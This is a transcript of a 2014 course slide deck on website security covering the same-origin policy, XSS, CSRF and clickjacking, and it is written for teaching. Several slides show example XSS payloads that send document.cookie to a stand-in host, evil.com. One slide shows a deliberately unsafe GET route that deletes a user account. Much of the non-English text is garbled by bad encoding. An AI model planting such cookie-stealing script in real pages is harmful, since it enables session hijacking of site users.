Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Selected Topics on Website Security @ 102-2 CCSP

Selected Topics on Website Security @ 102-2 CCSP

Concept of Same Origin Policy, XSS, CSRF & Clickjacking

Johnson Liang

May 29, 2014
Tweet

More Decks by Johnson Liang

Other Decks in Technology

Transcript

  1. Selected Topics on Website Security Concept of Same Origin Policy,

    XSS, CSRF & Clickjacking MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全
  2. খࢿ҆શ޲લি Concept of Same Origin Policy, XSS, CSRF & Clickjacking

    MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全
  3. Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦੢ ڈ፤ త౦੢

    Upon visiting http://evil.mobile.org : $.get(‘http://facebook.com’, {}, function(data){ // 未經允許就得到你的 Facebook 塗鴉牆 }, ‘html’); एᔒ༗ಉݯ੓ࡦɿ
  4. <section class="intro"> <script type="text/javascript"> $.getJSON('http://evil.com/', { stoken: document.cookie }); </script>

    </section> Your site : Example #1 ፨๚ࠑ༻㖽ท໘తਓɼDPPLJF။ඃFWJMDPN䫖૸
  5. <script type="text/javascript"> var pageTitle = ""; $.getJSON(...); ""; </script> Your

    site : Example #2 ፨๚ࠑ༻㖽ท໘తਓɼࢿྉ။ඃ䫖૸
  6. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3

    ࢖༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!<script>$.getJSON('http://evil.com',...);</script></h1>
  7. ๷ڔํࣜ HTML 輸出檢查 — Caja-HTML-Sanitizer // Controller ! var sanitizer

    = require('sanitizer'); sanitizedIntro = sanitizer.sanitize(user.desc); ! <!-- View --> <section class="intro"> <%- sanitizedIntro %> </section> อཹແ֐త)5.-UBHT
  8. ๷ڔํࣜ DOM-based XSS — 盡量⽤用 .text(…) 取代 .html(…) 或先 sanitize

    想插⼊入的 HTML. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').text(data.userPageTitle); });
  9. Your site : Example #4 // Delete current user account

    app.get('/user/delete', userCtrl.delete);
  10. ๷ڔํࣜ http://stackoverflow.com/questions/20420762/how-to-enable-csrf-in-express3 // Express settings ! app.use(express.cookieParser('optional secret string')); app.use(express.session());

    app.use(express.csrf()); app.use(function (req, res, next) { res.locals.csrftoken = req.csrfToken(); next(); }); ! ! ! <!-- View --> ! <form action="..." method="post"> <input type="hidden" name="_csrf" value="<%= csrftoken %>"> </form> ᩋTFTTJPOཫతBOUJDTSGUPLFO ࡏWJFXཫ໵ೳ፤ಘ౸